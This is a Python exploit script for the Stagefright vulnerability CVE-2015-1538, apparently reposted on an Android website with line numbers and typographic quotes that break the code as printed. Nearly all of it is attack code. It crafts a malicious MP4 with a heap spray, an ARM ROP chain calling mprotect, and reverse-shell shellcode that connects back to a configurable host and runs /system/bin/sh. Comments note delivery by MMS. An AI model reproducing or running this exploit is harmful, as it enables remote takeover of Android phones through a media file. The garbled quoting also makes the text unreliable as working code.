Androidiani.com

1. #!/usr/bin/env python
2. # Joshua J. Drake (@jduck) of ZIMPERIUM zLabs
3. # Shout outs to our friends at Optiv (formerly Accuvant Labs)
4. # (C) Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015
5. # www.zimperium.com
6. #
7. # Exploit for RCE Vulnerability CVE-2015-1538 #1
8. # Integer Overflow in the libstagefright MP4 ‘stsc’ atom handling
9. #
10. # Don’t forget, the output of “create_mp4” can be delivered many ways!
11. # MMS is the most dangerous attack vector, but not the only one…
12. #
13. # DISCLAIMER: This exploit is for testing and educational purposes only. Any
14. # other usage for this code is not allowed. Use at your own risk.
15. #
16. # “With great power comes great responsibility.” – Uncle Ben
17. #
18. import struct
19. import socket
20. #
21. # Creates a single MP4 atom – LEN, TAG, DATA
22. #
23. def make_chunk(tag, data):
24. if len(tag) != 4:
25. raise ‘Yo! They call it “FourCC” for a reason.’
26. ret = struct.pack(‘>L’, len(data) + 8)
27. ret += tag
28. ret += data
29. return ret
30. #
31. # Make an ‘stco’ atom – Sample Table Chunk Offets
32. #
33. def make_stco(extra=”):
34. ret = struct.pack(‘>L’, 0) # version
35. ret += struct.pack(‘>L’, 0) # mNumChunkOffsets
36. return make_chunk(‘stco’, ret+extra)
37.  
38. #
39. # Make an ‘stsz’ atom – Sample Table Size
40. #
41. def make_stsz(extra=”):
42. ret = struct.pack(‘>L’, 0) # version
43. ret += struct.pack(‘>L’, 0) # mDefaultSampleSize
44. ret += struct.pack(‘>L’, 0) # mNumSampleSizes
45. return make_chunk(‘stsz’, ret+extra)
46.  
47. #
48. # Make an ‘stts’ atom – Sample Table Time-to-Sample
49. #
50. def make_stts():
51. ret = struct.pack(‘>L’, 0) # version
52. ret += struct.pack(‘>L’, 0) # mTimeToSampleCount
53. return make_chunk(‘stts’, ret)
54. #
55. # This creates a single Sample Table Sample-to-Chunk entry
56. #
57. def make_stsc_entry(start, per, desc):
58. ret = ”
59. ret += struct.pack(‘>L’, start + 1)
60. ret += struct.pack(‘>L’, per)
61. ret += struct.pack(‘>L’, desc)
62. return ret
63.  
64. #
65. # Make an ‘stsc’ chunk – Sample Table Sample-to-Chunk
66. #
67. # If the caller desires, we will attempt to trigger (CVE-2015-1538 #1) and
68. # cause a heap overflow.
69. #
70. def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = False):
71. ret = struct.pack(‘>L’, 0) # version/flags
72.  
73. # this is the clean version…
74. if not do_overflow:
75. ret += struct.pack(‘>L’, num_alloc) # mNumSampleToChunkOffsets
76. ret += ‘Z’ * (12 * num_alloc)
77. return make_chunk(‘stsc’, ret)
78.  
79. # now the explicit version. (trigger the bug)
80. ret += struct.pack(‘>L’, 0xc0000000 + num_alloc) # mNumSampleToChunkOffsets
81.  
82. # fill in the entries that will overflow the buffer
83. for x in range(0, num_write):
84. ret += make_stsc_entry(sp_addr, sp_addr, sp_addr)
85.  
86. ret = make_chunk(‘stsc’, ret)
87.  
88. # patch the data_size
89. ret = struct.pack(‘>L’, 8 + 8 + (num_alloc * 12)) + ret[4:]
90.  
91. return ret
92.  
93. #
94. # Build the ROP chain
95. #
96. # ROP pivot by Georg Wicherski! Thanks!
97. #
98. “””
99. (gdb) x/10i __dl_restore_core_regs
100. 0xb0002850 <__dl_restore_core_regs>: add r1, r0, #52 ; 0x34
101. 0xb0002854 <__dl_restore_core_regs+4>: ldm r1, {r3, r4, r5}
102. 0xb0002858 <__dl_restore_core_regs+8>: push {r3, r4, r5}
103. 0xb000285c <__dl_restore_core_regs+12>: ldm r0, {r0, r1, r2, r3, r4, r5, r6, r7, r8, r9, r10, r11}
104. 0xb0002860 <__dl_restore_core_regs+16>: ldm sp, {sp, lr, pc}
105. “””
106.  
107. “””
108. b0001144 <__dl_mprotect>:
109. b0001144: e92d0090 push {r4, r7}
110. b0001148: e3a0707d mov r7, #125 ; 0x7d
111. b000114c: ef000000 svc 0x00000000
112. b0001150: e8bd0090 pop {r4, r7}
113. b0001154: e1b00000 movs r0, r0
114. b0001158: 512fff1e bxpl lr
115. b000115c: ea0015cc b b0006894 <__dl_raise+0x10>
116. “””
117.  
118. def build_rop(off, sp_addr, newpc_val, cb_host, cb_port):
119. rop = ”
120. rop += struct.pack(‘<L’, sp_addr + off + 0x10) # new sp
121. rop += struct.pack(‘<L’, 0xb0002a98) # new lr – pop {pc}
122. rop += struct.pack(‘<L’, 0xb00038b2+1) # new pc: pop {r0, r1, r2, r3, r4, pc}
123.  
124. rop += struct.pack(‘<L’, sp_addr & 0xfffff000) # new r0 – base address (page aligned)
125. rop += struct.pack(‘<L’, 0x1000) # new r1 – length
126. rop += struct.pack(‘<L’, 7) # new r2 – protection
127. rop += struct.pack(‘<L’, 0xd000d003) # new r3 – scratch
128. rop += struct.pack(‘<L’, 0xd000d004) # new r4 – scratch
129. rop += struct.pack(‘<L’, 0xb0001144) # new pc – _dl_mprotect
130.  
131. native_start = sp_addr + 0x80
132. rop += struct.pack(‘<L’, native_start) # address of native payload
133. #rop += struct.pack(‘<L’, 0xfeedfed5) # top of stack…
134. # linux/armle/shell_reverse_tcp (modified to pass env and fork/exit)
135. buf = ”
136. # fork
137. buf += ‘\x02\x70\xa0\xe3’
138. buf += ‘\x00\x00\x00\xef’
139. # continue if not parent…
140. buf += ‘\x00\x00\x50\xe3’
141. buf += ‘\x02\x00\x00\x0a’
142. # exit parent
143. buf += ‘\x00\x00\xa0\xe3’
144. buf += ‘\x01\x70\xa0\xe3’
145. buf += ‘\x00\x00\x00\xef’
146. # setsid in child
147. buf += ‘\x42\x70\xa0\xe3’
148. buf += ‘\x00\x00\x00\xef’
149. # socket/connect/dup2/dup2/dup2
150. buf += ‘\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x05\x20\x81\xe2\x8c’
151. buf += ‘\x70\xa0\xe3\x8d\x70\x87\xe2\x00\x00\x00\xef\x00\x60’
152. buf += ‘\xa0\xe1\x6c\x10\x8f\xe2\x10\x20\xa0\xe3\x8d\x70\xa0’
153. buf += ‘\xe3\x8e\x70\x87\xe2\x00\x00\x00\xef\x06\x00\xa0\xe1’
154. buf += ‘\x00\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x06’
155. buf += ‘\x00\xa0\xe1\x01\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00’
156. buf += ‘\x00\xef\x06\x00\xa0\xe1\x02\x10\xa0\xe3\x3f\x70\xa0’
157. buf += ‘\xe3\x00\x00\x00\xef’
158. # execve(shell, argv, env)
159. buf += ‘\x30\x00\x8f\xe2\x04\x40\x24\xe0’
160. buf += ‘\x10\x00\x2d\xe9\x38\x30\x8f\xe2\x08\x00\x2d\xe9\x0d’
161. buf += ‘\x20\xa0\xe1\x10\x00\x2d\xe9\x24\x40\x8f\xe2\x10\x00’
162. buf += ‘\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00’
163. buf += ‘\xef\x02\x00’
164. # Add the connect back host/port
165. buf += struct.pack(‘!H’, cb_port)
166. cb_host = socket.inet_aton(cb_host)
167. buf += struct.pack(‘=4s’, cb_host)
168. # shell –
169. buf += ‘/system/bin/sh\x00\x00’
170. # argv –
171. buf += ‘sh\x00\x00’
172. # env –
173. buf += ‘PATH=/sbin:/vendor/bin:/system/sbin:/system/bin:/system/xbin\x00’
174.  
175. # Add some identifiable stuff, just in case something goes awry…
176. rop_start_off = 0x34
177. x = rop_start_off + len(rop)
178. while len(rop) < 0x80 – rop_start_off:
179. rop += struct.pack(‘<L’, 0xf0f00000+x)
180. x += 4
181.  
182. # Add the native payload…
183. rop += buf
184.  
185. return rop
186.  
187. #
188. # Build an mp4 that exploits CVE-2015-1538 #1
189. #
190. # We mimic meow.3gp here…
191. #
192. def create_mp4(sp_addr, newpc_val, cb_host, cb_port):
193. chunks = []
194.  
195. # Build the MP4 header…
196. ftyp = ‘mp42’
197. ftyp += struct.pack(‘>L’, 0)
198. ftyp += ‘mp42’
199. ftyp += ‘isom’
200. chunks.append(make_chunk(‘ftyp’, ftyp))
201.  
202. # Note, this causes a few allocations…
203. moov_data = ”
204. moov_data += make_chunk(‘mvhd’,
205. struct.pack(‘>LL’, 0, 0x41414141) +
206. (‘B’ * 0x5c) )
207.  
208. # Add a minimal, verified trak to satisfy mLastTrack being set
209. moov_data += make_chunk(‘trak’,
210. make_chunk(‘stbl’,
211. make_stsc(0x28, 0x28) +
212. make_stco() +
213. make_stsz() +
214. make_stts() ))
215.  
216. # Spray the heap using a large tx3g chunk (can contain binary data!)
217. “””
218. 0x4007004e <_ZNK7android7RefBase9decStrongEPKv+2>: ldr r4, [r0, #4] ; load mRefs
219. 0x40070050 <_ZNK7android7RefBase9decStrongEPKv+4>: mov r5, r0
220. 0x40070052 <_ZNK7android7RefBase9decStrongEPKv+6>: mov r6, r1
221. 0x40070054 <_ZNK7android7RefBase9decStrongEPKv+8>: mov r0, r4
222. 0x40070056 <_ZNK7android7RefBase9decStrongEPKv+10>: blx 0x40069884 ; atomic_decrement
223. 0x4007005a <_ZNK7android7RefBase9decStrongEPKv+14>: cmp r0, #1 ; must be 1
224. 0x4007005c <_ZNK7android7RefBase9decStrongEPKv+16>: bne.n 0x40070076 <_ZNK7android7RefBase9decStrongEPKv+42>
225. 0x4007005e <_ZNK7android7RefBase9decStrongEPKv+18>: ldr r0, [r4, #8] ; load refs->mBase
226. 0x40070060 <_ZNK7android7RefBase9decStrongEPKv+20>: ldr r1, [r0, #0] ; load mBase._vptr
227. 0x40070062 <_ZNK7android7RefBase9decStrongEPKv+22>: ldr r2, [r1, #12] ; load method address
228. 0x40070064 <_ZNK7android7RefBase9decStrongEPKv+24>: mov r1, r6
229. 0x40070066 <_ZNK7android7RefBase9decStrongEPKv+26>: blx r2 ; call it!
230. “””
231. page = ”
232. off = 0 # the offset to the next object
233. off += 8
234. page += struct.pack(‘<L’, sp_addr + 8 + 16 + 8 + 12 – 28) # _vptr.RefBase (for when we smash mDataSource)
235. page += struct.pack(‘<L’, sp_addr + off) # mRefs
236. off += 16
237. page += struct.pack(‘<L’, 1) # mStrong
238. page += struct.pack(‘<L’, 0xc0dedbad) # mWeak
239. page += struct.pack(‘<L’, sp_addr + off) # mBase
240. page += struct.pack(‘<L’, 16) # mFlags (dont set OBJECT_LIFETIME_MASK)
241. off += 8
242. page += struct.pack(‘<L’, sp_addr + off) # the mBase _vptr.RefBase
243. page += struct.pack(‘<L’, 0xf00dbabe) # mBase.mRefs (unused)
244. off += 16
245. page += struct.pack(‘<L’, 0xc0de0000 + 0x00) # vtable entry 0
246. page += struct.pack(‘<L’, 0xc0de0000 + 0x04) # vtable entry 4
247. page += struct.pack(‘<L’, 0xc0de0000 + 0x08) # vtable entry 8
248. page += struct.pack(‘<L’, newpc_val) # vtable entry 12
249. rop = build_rop(off, sp_addr, newpc_val, cb_host, cb_port)
250. x = len(page)
251. while len(page) < 4096:
252. page += struct.pack(‘<L’, 0xf0f00000+x)
253. x += 4
254.  
255. off = 0x34
256. page = page[:off] + rop + page[off+len(rop):]
257. spray = page * (((2*1024*1024) / len(page)) – 20)
258. moov_data += make_chunk(‘tx3g’, spray)
259. block = ‘A’ * 0x1c
260. bigger = ‘B’ * 0x40
261. udta = make_chunk(‘udta’,
262. make_chunk(‘meta’,
263. struct.pack(‘>L’, 0) +
264. make_chunk(‘ilst’,
265. make_chunk(‘cpil’, make_chunk(‘data’, struct.pack(‘>LL’, 21, 0) + ‘A’)) +
266. make_chunk(‘trkn’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + ‘AAAABBBB’)) +
267. make_chunk(‘disk’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + ‘AAAABB’)) +
268. make_chunk(‘covr’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) * 32 +
269. make_chunk(‘\xa9alb’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) +
270. make_chunk(‘\xa9ART’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) +
271. make_chunk(‘aART’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) +
272. make_chunk(‘\xa9day’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) +
273. make_chunk(‘\xa9nam’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) +
274. make_chunk(‘\xa9wrt’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) +
275. make_chunk(‘gnre’, make_chunk(‘data’, struct.pack(‘>LL’, 1, 0) + block)) +
276. make_chunk(‘covr’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) * 32 +
277. make_chunk(‘\xa9ART’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + bigger)) +
278. make_chunk(‘\xa9wrt’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + bigger)) +
279. make_chunk(‘\xa9day’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + bigger)))
280. )
281. )
282. moov_data += udta
283.  
284. # Make the nasty trak
285. tkhd1 = ”.join([
286. ‘\x00’, # version
287. ‘D’ * 3, # padding
288. ‘E’ * (5*4), # {c,m}time, id, ??, duration
289. ‘F’ * 0x10, # ??
290. struct.pack(‘>LLLLLL’,
291. 0x10000, # a00
292. 0, # a01
293. 0, # dx
294. 0, # a10
295. 0x10000, # a11
296. 0), # dy
297. ‘G’ * 0x14
298. ])
299.  
300. trak1 = ”
301. trak1 += make_chunk(‘tkhd’, tkhd1)
302.  
303. mdhd1 = ”.join([
304. ‘\x00’, # version
305. ‘D’ * 0x17, # padding
306. ])
307.  
308. mdia1 = ”
309. mdia1 += make_chunk(‘mdhd’, mdhd1)
310. mdia1 += make_chunk(‘hdlr’, ‘F’ * 0x3a)
311.  
312. dinf1 = ”
313. dinf1 += make_chunk(‘dref’, ‘H’ * 0x14)
314.  
315. minf1 = ”
316. minf1 += make_chunk(‘smhd’, ‘G’ * 0x08)
317. minf1 += make_chunk(‘dinf’, dinf1)
318.  
319. # Build the nasty sample table to trigger the vulnerability here.
320. stbl1 = make_stsc(3, (0x1200 / 0xc) – 1, sp_addr, True) # TRIGGER
321.  
322. # Add the stbl to the minf chunk
323. minf1 += make_chunk(‘stbl’, stbl1)
324.  
325. # Add the minf to the mdia chunk
326. mdia1 += make_chunk(‘minf’, minf1)
327.  
328. # Add the mdia to the track
329. trak1 += make_chunk(‘mdia’, mdia1)
330.  
331. # Add the nasty track to the moov data
332. moov_data += make_chunk(‘trak’, trak1)
333.  
334. # Finalize the moov chunk
335. moov = make_chunk(‘moov’, moov_data)
336. chunks.append(moov)
337.  
338. # Combine outer chunks together and voila.
339. data = ”.join(chunks)
340.  
341. return data
342.  
343. if __name__ == ‘__main__’:
344. import sys
345. import mp4
346. import argparse
347.  
348. def write_file(path, content):
349. with open(path, ‘wb’) as f:
350. f.write(content)
351.  
352. def addr(sval):
353. if sval.startswith(‘0x’):
354. return int(sval, 16)
355. return int(sval)
356.  
357. # The address of a fake StrongPointer object (sprayed)
358. sp_addr = 0x41d00010 # takju @ imm76i – 2MB (via hangouts)
359.  
360. # The address to of our ROP pivot
361. newpc_val = 0xb0002850 # point sp at __dl_restore_core_regs
362.  
363. # Allow the user to override parameters
364. parser = argparse.ArgumentParser()
365. parser.add_argument(‘-c’, ‘–connectback-host’, dest=’cbhost’, default=’31.3.3.7′)
366. parser.add_argument(‘-p’, ‘–connectback-port’, dest=’cbport’, type=int, default=12345)
367. parser.add_argument(‘-s’, ‘–spray-address’, dest=’spray_addr’, type=addr, default=None)
368. parser.add_argument(‘-r’, ‘–rop-pivot’, dest=’rop_pivot’, type=addr, default=None)
369. parser.add_argument(‘-o’, ‘–output-file’, dest=’output_file’, default=’cve-2015-1538-1.mp4′)
370. args = parser.parse_args()
371.  
372. if len(sys.argv) == 1:
373. parser.print_help()
374. sys.exit(-1)
375.  
376. if args.spray_addr == None:
377. args.spray_addr = sp_addr
378. if args.rop_pivot == None:
379. args.rop_pivot = newpc_val
380.  
381. # Build the MP4 file…
382. data = mp4.create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)
383. print(‘[*] Saving crafted MP4 to %s …’ % args.output_file)
384. write_file(args.output_file, data)